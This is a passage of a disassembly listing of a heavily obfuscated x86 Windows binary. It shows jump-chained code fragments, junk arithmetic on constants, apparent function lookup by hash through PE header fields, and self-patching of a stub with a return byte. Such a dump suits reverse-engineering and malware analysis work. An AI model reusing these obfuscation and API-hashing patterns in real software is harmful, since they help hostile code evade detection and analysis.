loc_44EAEE:				; CODE XREF: sub_44DB40:loc_449150j
					; sub_4480CB:loc_449161j
		push	offset loc_447982
		jmp	nullsub_87
; END OF FUNCTION CHUNK	FOR sub_4480CB

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_44EAF8	proc near		; CODE XREF: sub_450203-13578j
		retn
sub_44EAF8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44EAF9:				; CODE XREF: sub_45B7AA-6A39j
		jmp	loc_445D7B
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_44EAFE:				; CODE XREF: sub_44B814-3563j
		jmp	loc_440877
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
		push	esi
		mov	esi, edx
		xchg	esi, [esp]
		call	sub_454D0F
		mov	eax, 4CF1C9EDh
		call	sub_442C3E
		mov	ds:dword_41E110, eax
		jmp	loc_444883
; ---------------------------------------------------------------------------
		adc	edi, 0B6C5BC8Ch
		jmp	loc_4423D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456D3F

loc_44EB2E:				; CODE XREF: sub_456D3F:loc_450761j
		jnz	loc_442387
; END OF FUNCTION CHUNK	FOR sub_456D3F
; START	OF FUNCTION CHUNK FOR sub_44289F

loc_44EB34:				; CODE XREF: sub_44289F:loc_459F87j
		jmp	loc_457596
; END OF FUNCTION CHUNK	FOR sub_44289F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44EB39:				; CODE XREF: sub_4448E2-84ADj
		xchg	esi, [esp+0]
		mov	eax, edx
		push	edi
		push	0FB180A77h
		pop	edi

loc_44EB45:				; CODE XREF: y2kk37jd:00444A04j
		and	edi, 0DA8994Ch
		add	edi, 0F73C459Bh
		jmp	loc_44C1D6
; END OF FUNCTION CHUNK	FOR sub_4448E2

; =============== S U B	R O U T	I N E =======================================



sub_44EB56	proc near		; DATA XREF: y2kk37jd:00449E47o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D0D7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044129C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004476CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451AF9 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00459889 SIZE 00000008 BYTES

		push	0
		push	4B54641h
		pop	eax
		xor	eax, ds:4000EAh
		sub	eax, 8ECB26CCh
		xor	eax, 2CE3D587h
		cmp	eax, 2F96E1B8h
		jmp	loc_4476CB
sub_44EB56	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_120. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44EB7C:				; CODE XREF: y2kk37jd:loc_44061Bj
		popf
		jmp	loc_44D367
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446183

loc_44EB82:				; CODE XREF: sub_446183:loc_453C25j
		push	eax
		mov	eax, edx
		push	edi
		push	12D972Eh
		pop	edi
		and	edi, 87F83D19h
		sub	edi, 0B951A53h
		jmp	loc_456266
; END OF FUNCTION CHUNK	FOR sub_446183
; ---------------------------------------------------------------------------

locret_44EB9D:				; CODE XREF: y2kk37jd:0045C554j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457C64

loc_44EB9E:				; CODE XREF: sub_457C64-9735j
		jmp	sub_45C5C5
; END OF FUNCTION CHUNK	FOR sub_457C64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443525

loc_44EBA3:				; CODE XREF: sub_443525+3j
		jmp	loc_43B7DA
; END OF FUNCTION CHUNK	FOR sub_443525
; ---------------------------------------------------------------------------

loc_44EBA8:				; CODE XREF: y2kk37jd:0045A983j
		pop	esi
		call	sub_451D89
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_44EBAE:				; CODE XREF: sub_44DED9+758Bj
		jmp	loc_446D28
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B4E1

loc_44EBB3:				; CODE XREF: sub_44B4E1+12j
		jnz	loc_441698
		shr	edi, 1Eh
		push	0C61731FDh
		mov	[ebp+0], edx
		jmp	loc_441698
; END OF FUNCTION CHUNK	FOR sub_44B4E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_44EBC9:				; CODE XREF: sub_44DED9:loc_445821j
		jnz	loc_4482FB
		jmp	loc_43B635
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424B0

loc_44EBD4:				; CODE XREF: sub_4424B0:loc_459B5Aj
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_4581B0
		jmp	loc_4541D2
; END OF FUNCTION CHUNK	FOR sub_4424B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_44EBE3:				; CODE XREF: sub_45ADEC-1433Cj
		not	ebp
		and	ebp, 75A8F982h
		jmp	loc_447F05
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443360

loc_44EBF0:				; CODE XREF: sub_443360:loc_44939Bj
		push	8762C4E6h
		pop	eax
		sub	eax, 59A452FFh
		cmp	eax, 0D60184F1h
		jmp	loc_45C450
; END OF FUNCTION CHUNK	FOR sub_443360
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 1Ch
		mov	ds:dword_446BAC, eax
		retn
; ---------------------------------------------------------------------------

loc_44EC12:				; CODE XREF: y2kk37jd:0044E297j
		jmp	locret_4464ED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB32

loc_44EC17:				; CODE XREF: sub_44DB32j
		push	offset loc_4566CC
		jmp	nullsub_88
; END OF FUNCTION CHUNK	FOR sub_44DB32

; =============== S U B	R O U T	I N E =======================================



sub_44EC21	proc near		; CODE XREF: y2kk37jd:00440684j
					; sub_4468E0+11924p

; FUNCTION CHUNK AT 0043B6E6 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043BA82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044224A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445B87 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00446469 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045667E SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	0B6A29CFh
		pop	edx
		add	edx, 396000A9h
		test	edx, 4
		jmp	loc_44224A
sub_44EC21	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_44EC3C:				; CODE XREF: sub_43B0F5+16FE8j
					; sub_452C4F+7j
		mov	eax, [ebp-0Ch]
		movzx	eax, byte ptr [eax]
		add	[ebp-8], eax
		mov	eax, [ebp-8]
		shl	eax, 0Ah
		add	[ebp-8], eax
		jmp	loc_44112B
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457FDC

loc_44EC53:				; CODE XREF: sub_457FDC-1263Dj
		and	ebx, 22E55AF9h
		or	edi, ecx
		and	edi, ebx
		jmp	loc_44D36E
; END OF FUNCTION CHUNK	FOR sub_457FDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_44EC62:				; CODE XREF: sub_43B8D6+6D11j
		pop	edx
		xor	edx, 0C97EFA5Eh
		test	edx, 80h
		jmp	loc_43B59F
; END OF FUNCTION CHUNK	FOR sub_43B8D6
; ---------------------------------------------------------------------------

loc_44EC74:				; CODE XREF: y2kk37jd:0044502Aj
		jl	loc_45321E

loc_44EC7A:				; CODE XREF: y2kk37jd:00458D4Cj
		rol	ebx, 1Bh
		add	ebx, 1B90F559h
		cmp	ebx, 0A20337CFh
		jmp	loc_44BA8F
; ---------------------------------------------------------------------------

loc_44EC8E:				; CODE XREF: y2kk37jd:00450B7Ej
		push	ecx
		mov	ecx, eax
		push	offset loc_44109A
		jmp	loc_43C3DB
; ---------------------------------------------------------------------------
		mov	[ebp-4], eax
		call	sub_454E20
; START	OF FUNCTION CHUNK FOR sub_43BFAE

loc_44ECA3:				; CODE XREF: sub_43BFAE+13j
		jmp	loc_43CA89
; END OF FUNCTION CHUNK	FOR sub_43BFAE

; =============== S U B	R O U T	I N E =======================================



sub_44ECA8	proc near		; CODE XREF: y2kk37jd:00442099j
					; y2kk37jd:00453227p

; FUNCTION CHUNK AT 004593B7 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	0DBEDED92h
		pop	eax
		or	eax, 0E6F2807Eh
		add	eax, 21D84B3Fh
		jmp	loc_4593B7
sub_44ECA8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_44ECC3:				; CODE XREF: sub_443AA7:loc_448FFDj
		jnz	loc_4596E9
		jmp	loc_443F2A
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------

loc_44ECCE:				; CODE XREF: y2kk37jd:0044BF85j
		jz	near ptr dword_449428+7
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_44ECD4:				; CODE XREF: sub_44610D:loc_456783j
					; sub_4597AE+2A1Aj
		jmp	nullsub_5
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D81

loc_44ECD9:				; CODE XREF: sub_440D81+Bj
		jmp	nullsub_89
; END OF FUNCTION CHUNK	FOR sub_440D81
; ---------------------------------------------------------------------------
		dw 8E0Fh
		dd 0C8D8h, 3BE9F92Bh
		db 0A7h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_44ECEB:				; DATA XREF: y2kk37jd:loc_43E959o
		mov	eax, [ebp-1Ch]
		cmp	byte ptr [eax],	2Eh
		jnz	loc_458197
		mov	eax, [ebp-20h]
		mov	byte ptr [eax],	64h
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-20h]
		mov	byte ptr [eax],	6Ch
		jmp	loc_45AC46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B489

loc_44ED0B:				; CODE XREF: sub_44B489+1Cj
		and	eax, 18C8B7F7h
		add	eax, 0E78424F3h
		call	sub_43F4E7

loc_44ED1C:				; CODE XREF: sub_456A36-7BB2j
		jmp	loc_44F227
; END OF FUNCTION CHUNK	FOR sub_44B489
; ---------------------------------------------------------------------------

loc_44ED21:				; CODE XREF: y2kk37jd:00447147j
		jmp	loc_458119
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45922C

loc_44ED26:				; CODE XREF: sub_45922C+177Fj
		mov	eax, 65D7B1DCh
		cmp	ecx, ebx
		jmp	loc_44CE71
; END OF FUNCTION CHUNK	FOR sub_45922C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6A5

loc_44ED32:				; CODE XREF: sub_44D6A5:loc_45B56Aj
		rol	edx, 1Eh
		xor	edx, 22A1EF10h
		call	sub_440CD1
		push	eax
		ror	eax, 8
		jmp	loc_44935E
; END OF FUNCTION CHUNK	FOR sub_44D6A5
; ---------------------------------------------------------------------------
		jb	sub_4553C1
		jmp	sub_43BB6F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44ED54:				; CODE XREF: sub_445226+E205j
		jnz	loc_44B6BB
		jmp	loc_453EE8
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_398. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		push	eax
		jmp	loc_4598BC
; ---------------------------------------------------------------------------

loc_44ED66:				; DATA XREF: y2kk37jd:00444A0Fo
		push	esi
		push	offset sub_44966C
		jmp	loc_43FE67
; ---------------------------------------------------------------------------

locret_44ED71:				; CODE XREF: y2kk37jd:loc_44B207j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_44ED72:				; CODE XREF: sub_43BD0D:loc_45657Bj
		mov	ecx, edi
		pop	edi
		add	ecx, 0FCB0C13Ch
		and	ecx, ds:4000E8h
		xor	ecx, 502716D8h
		add	eax, ecx
		xchg	eax, [esp+0Ch+var_C]
		jmp	loc_442643
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
		add	edi, 2C89E370h
		jmp	loc_444BB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443360

loc_44ED9C:				; CODE XREF: sub_4507BF-B11Dj
					; sub_443360:loc_458A05j
		pop	esi

loc_44ED9D:				; CODE XREF: y2kk37jd:loc_44F4C2j
		sub	esi, 30283782h
		and	esi, 0E1EED30h
		add	esi, 0F1F953E0h
		xchg	esi, [esp+0]
		push	10h
		mov	eax, [ebp+8]
		push	ebx
		jmp	loc_458B22
; END OF FUNCTION CHUNK	FOR sub_443360
; ---------------------------------------------------------------------------

loc_44EDBD:				; CODE XREF: y2kk37jd:0044D82Fj
		mov	edi, ebx
		cmp	eax, 0FE8AA15Ah
		jmp	loc_444B8A
; ---------------------------------------------------------------------------

loc_44EDCA:				; DATA XREF: sub_4423DA:loc_43D3ADo
		xchg	edi, [esp]
		jmp	loc_453C2A
; ---------------------------------------------------------------------------

loc_44EDD2:				; CODE XREF: y2kk37jd:00450CD1j
		and	esi, 0A57ADEC7h
		xor	esi, 95DA8BD2h
		add	esi, 0EF891036h
		mov	[esi], eax
		pop	esi
		lea	eax, nullsub_494
		jmp	loc_44AF47
; ---------------------------------------------------------------------------

loc_44EDF2:				; CODE XREF: y2kk37jd:0044C45Dj
		add	ebp, 0C655D538h

; =============== S U B	R O U T	I N E =======================================



sub_44EDF8	proc near		; CODE XREF: sub_458B55+6p

var_4		= dword	ptr -4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 004459D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004482E6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044957B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449D03 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00456B74 SIZE 00000009 BYTES

		xchg	eax, [esp+0]
		pop	eax
		pop	ecx
		js	loc_456B74
		mov	eax, [esp+4+var_4]
		jmp	loc_449D03
sub_44EDF8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44EE0B:				; CODE XREF: y2kk37jd:0044DDA8j
					; y2kk37jd:0044EFB5j
		cmp	ebx, 0B7349D68h
		jmp	loc_44B5D3
; ---------------------------------------------------------------------------

loc_44EE16:				; CODE XREF: y2kk37jd:0043BDA0j
		js	loc_44A89D
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_44EE1C:				; CODE XREF: sub_449C4F:loc_447D19j
		xor	edx, 9BA00B45h
		add	edx, 7EA95BE5h
		rol	edx, 5
		cmp	edx, 10A101Ah
		jmp	loc_43B5BB
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------

loc_44EE36:				; DATA XREF: sub_45B583-112A8o
		xchg	edx, [esp]
		mov	ebp, edx
		pop	edx
		retn

; =============== S U B	R O U T	I N E =======================================



sub_44EE3D	proc near		; CODE XREF: sub_442A84:loc_44E4F5p
					; sub_4441FF+EE58p ...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043BFD1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043DE60 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E222 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004470BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BC94 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044CEFD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00455984 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004564B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045793D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B70D SIZE 0000001F BYTES

		jb	sub_4518C3
		push	ebp
		mov	ebp, esp
		push	esi
		jmp	loc_4564B9
sub_44EE3D	endp

; ---------------------------------------------------------------------------
		mov	ebp, 5EBBFA09h
		jmp	sub_445E03
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_430. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_44EE57:				; CODE XREF: sub_44610D:loc_443326j
					; sub_444D6F+1614Ej
		jmp	nullsub_218
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_44EE5C:				; CODE XREF: sub_44594E:loc_442AF2j
					; y2kk37jd:00442B14j
		sub	eax, 375DA866h
		xor	eax, 68BA29CCh
		call	sub_454413
		jmp	loc_446189
; END OF FUNCTION CHUNK	FOR sub_44594E
; ---------------------------------------------------------------------------
		jmp	loc_457EF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A36

loc_44EE77:				; CODE XREF: sub_456A36:loc_458BF4j
		push	esi
		push	0B1B9AA32h
		pop	esi
		add	esi, 68DEB487h
		jmp	loc_44ED1C
; END OF FUNCTION CHUNK	FOR sub_456A36
; ---------------------------------------------------------------------------

locret_44EE89:				; CODE XREF: y2kk37jd:loc_43DEF8j
		retn
; ---------------------------------------------------------------------------

loc_44EE8A:				; CODE XREF: y2kk37jd:0043BBAAj
		jge	loc_457221
		pop	edi
		jnb	loc_43D386
		add	edi, 7ABBEDFAh

loc_44EE9D:				; CODE XREF: y2kk37jd:0043BBA2j
		or	eax, 6B65E01Fh
		jmp	loc_459557
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_44EEA8:				; CODE XREF: sub_4514DE-1118Bj
		push	9650148Eh
		pop	eax
		xor	eax, 0F4C16DEDh
		and	eax, 45817477h
		rol	eax, 1Ah
		sub	eax, 918CA88Ch
		jmp	loc_450AF2
; END OF FUNCTION CHUNK	FOR sub_4514DE

; =============== S U B	R O U T	I N E =======================================



sub_44EEC8	proc near		; DATA XREF: sub_4502E6-40D2o

; FUNCTION CHUNK AT 00449706 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044F325 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C0C5 SIZE 0000000B BYTES

		cmp	byte ptr [eax],	0F1h
		jnz	loc_450C21
		jmp	loc_45C0C5
sub_44EEC8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B6E

loc_44EED6:				; CODE XREF: sub_446B6E+Bj
		mov	eax, edx
		xchg	eax, [esp+4+var_4]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+8+var_8]
		push	0DD82D412h
		pop	edx
		add	edx, 5511B2EBh
		jmp	loc_445D46
; END OF FUNCTION CHUNK	FOR sub_446B6E
; ---------------------------------------------------------------------------

loc_44EEF2:				; CODE XREF: y2kk37jd:0044E599j
		mov	eax, [esp]
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp]
		push	ecx
		push	0A7B9A6E1h
		xchg	edx, [esp]
		mov	ecx, edx
		jmp	loc_4452BD
; ---------------------------------------------------------------------------

loc_44EF0B:				; CODE XREF: y2kk37jd:00446DEAj
		xchg	edi, esi

; =============== S U B	R O U T	I N E =======================================



sub_44EF0D	proc near		; CODE XREF: sub_448CAE+1152Bp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044AD80 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D97E SIZE 00000019 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	edi
		jmp	loc_44D97E
sub_44EF0D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44EF17:				; CODE XREF: sub_4448E2+C1j
		adc	ebp, 4ED23037h
		pop	edi
		jl	loc_4558AC
		pop	edx
		jmp	loc_45BF35
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
		cmp	edx, ebx
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_44EF2C:				; CODE XREF: sub_43E679:loc_441705j
		jmp	loc_448652
; END OF FUNCTION CHUNK	FOR sub_43E679
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45447D

loc_44EF31:				; CODE XREF: sub_45447D:loc_43DB57j
		popf
		jz	loc_448815
		jmp	loc_43D23F
; END OF FUNCTION CHUNK	FOR sub_45447D
; ---------------------------------------------------------------------------

loc_44EF3D:				; CODE XREF: y2kk37jd:0045C68Dj
		pop	ecx
		mov	eax, [esp]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp]
		call	sub_456BCD

loc_44EF4C:				; DATA XREF: y2kk37jd:0043B095o
		add	edx, ebp
		add	edx, 82676AAFh
		mov	[edx], eax
		pop	edx
		jmp	loc_44AB1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_44EF5C:				; CODE XREF: sub_43F2F2:loc_44B6AEj
					; sub_43F2F2+1333Ej
		call	sub_447977
		push	68489189h
		pop	edx
		add	edx, 0C33822BAh
		xor	edx, 0A3EABB15h
		or	edx, ds:4000F3h
		add	edx, 0E243EEE8h
		jmp	loc_443976
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
		add	ecx, 39CD9301h
		jmp	sub_43E389
; ---------------------------------------------------------------------------

loc_44EF8F:				; CODE XREF: y2kk37jd:00454891j
		jz	loc_43D2E2
		jmp	loc_43D662
; ---------------------------------------------------------------------------

loc_44EF9A:				; CODE XREF: y2kk37jd:00459B8Fj
		jg	loc_44FB3A
		or	edx, 7A77D96h
		jmp	loc_45627B
; ---------------------------------------------------------------------------

loc_44EFAB:				; CODE XREF: y2kk37jd:loc_44BAF9j
		mov	edx, ebx
		jle	loc_45A435
		sub	edi, edx
		jmp	loc_44EE0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44EFBA:				; CODE XREF: sub_445226:loc_457AA3j
		jl	loc_451924

loc_44EFC0:				; CODE XREF: y2kk37jd:004476E9j
		jmp	loc_4496DD
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	eax, 0EDAB01DDh
		jmp	loc_451922
; ---------------------------------------------------------------------------

loc_44EFCF:				; CODE XREF: y2kk37jd:004481FFj
		adc	edx, 0A91ECE7Eh

; =============== S U B	R O U T	I N E =======================================



sub_44EFD5	proc near		; CODE XREF: sub_45C4C8p

; FUNCTION CHUNK AT 004553E2 SIZE 0000000A BYTES

		xchg	edx, [esp+0]
		pop	edx
		jb	loc_4553E2
		push	ebp
		mov	ebp, esp
		jmp	sub_443360
sub_44EFD5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454251

loc_44EFE7:				; CODE XREF: sub_454251-BEj
		cmp	ecx, esi
		jmp	loc_447C21
; END OF FUNCTION CHUNK	FOR sub_454251
; ---------------------------------------------------------------------------

loc_44EFEE:				; CODE XREF: y2kk37jd:00443F25j
		mov	ebp, 0C2E95683h
		shr	ebx, 13h
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44EFF6:				; CODE XREF: sub_445226-1314j
		xor	eax, 50E3BE41h
		add	eax, 1396C591h
		add	eax, ebp
		add	eax, 0A296BD04h
		popf
		xor	edx, edx
		jmp	loc_43CF50
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_44F012:				; CODE XREF: sub_44B924-102C9j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0E8h
		jnz	loc_456E9C
		mov	eax, [ebp-4]
		inc	eax
		jmp	loc_443C38
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------

loc_44F027:				; CODE XREF: y2kk37jd:loc_4516BCj
		or	ecx, 57D051Bh
		jmp	loc_4400F4
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_44F033:				; CODE XREF: sub_44CF38+Cj
		jnz	loc_44C8F9
		jmp	loc_44392E
; END OF FUNCTION CHUNK	FOR sub_44CF38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44F03E:				; CODE XREF: sub_43F911:loc_44C7C6j
		test	edx, 6ACE5957h
		jmp	loc_459C75
; END OF FUNCTION CHUNK	FOR sub_43F911
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_132. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_44F04A:				; CODE XREF: sub_45689F-D716j
		jmp	nullsub_188
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466E0

loc_44F04F:				; CODE XREF: sub_4466E0+13j
		jmp	loc_44C560
; END OF FUNCTION CHUNK	FOR sub_4466E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4587AA

loc_44F054:				; CODE XREF: sub_4587AA+352Bj
		jg	loc_458C6C

loc_44F05A:				; CODE XREF: y2kk37jd:loc_4515A9j
		push	eax
		call	sub_455A53
; END OF FUNCTION CHUNK	FOR sub_4587AA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_305. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458C2B

loc_44F061:				; CODE XREF: sub_458C2B+9j
		add	eax, [ebp-4]
; END OF FUNCTION CHUNK	FOR sub_458C2B
; START	OF FUNCTION CHUNK FOR sub_44704D

loc_44F064:				; CODE XREF: sub_44704D:loc_440F9Cj
		add	eax, 18h
		mov	[ebp-10h], eax
		mov	eax, [ebp-10h]
		mov	eax, [eax+60h]
		add	eax, [ebp-4]
		mov	[ebp-14h], eax
		jmp	loc_447B39
; END OF FUNCTION CHUNK	FOR sub_44704D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A53E

loc_44F07B:				; CODE XREF: sub_44A53E:loc_44F9A6j
		jmp	ds:off_41E1F0
; END OF FUNCTION CHUNK	FOR sub_44A53E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_44F081:				; CODE XREF: sub_43B8D6:loc_441044j
		jmp	loc_44E173
; END OF FUNCTION CHUNK	FOR sub_43B8D6

; =============== S U B	R O U T	I N E =======================================



sub_44F086	proc near		; CODE XREF: sub_44A53Ep sub_44B0F0+3j ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B93E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447913 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449FD5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B0F8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00451160 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451D4E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453259 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045C22F SIZE 00000006 BYTES

		pop	edx
		js	loc_44B0F8
		mov	eax, [esp+4+var_4]
		jmp	loc_44536E
sub_44F086	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_44F095:				; CODE XREF: y2kk37jd:00459B05j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_44F096:				; CODE XREF: sub_44D302+5B6Bj
		jmp	loc_45B633
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E03C

loc_44F09B:				; CODE XREF: sub_43E03C:loc_44C667j
					; y2kk37jd:loc_454A15j
		jnz	loc_4598CC
		jmp	loc_43F2B7
; END OF FUNCTION CHUNK	FOR sub_43E03C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44F0A6:				; CODE XREF: sub_43F8B8+5DEj
		cmp	edi, 0D7E48C3Bh
		jmp	loc_43D016
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------

loc_44F0B1:				; CODE XREF: y2kk37jd:0043EAFCj
		mov	edi, edx
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_44F0B3:				; CODE XREF: sub_442DDC:loc_43EAE1j
		and	esi, 0DD28970Ah
		cmp	esi, 191EC8E7h
		jmp	loc_43BFC7
; END OF FUNCTION CHUNK	FOR sub_442DDC
; ---------------------------------------------------------------------------
		test	al, al
		jz	nullsub_146
		jmp	loc_43EB12
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_44F0D1:				; CODE XREF: sub_4578A6:loc_43C2F5j
		rol	ecx, 1Bh
		cmp	esi, 950094D9h
		jmp	loc_44266E
; END OF FUNCTION CHUNK	FOR sub_4578A6
; ---------------------------------------------------------------------------
		mov	eax, 4CF1C9EDh
		call	sub_442C3E
		mov	ds:dword_41E110, eax
		lea	eax, nullsub_5
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_5
; ---------------------------------------------------------------------------

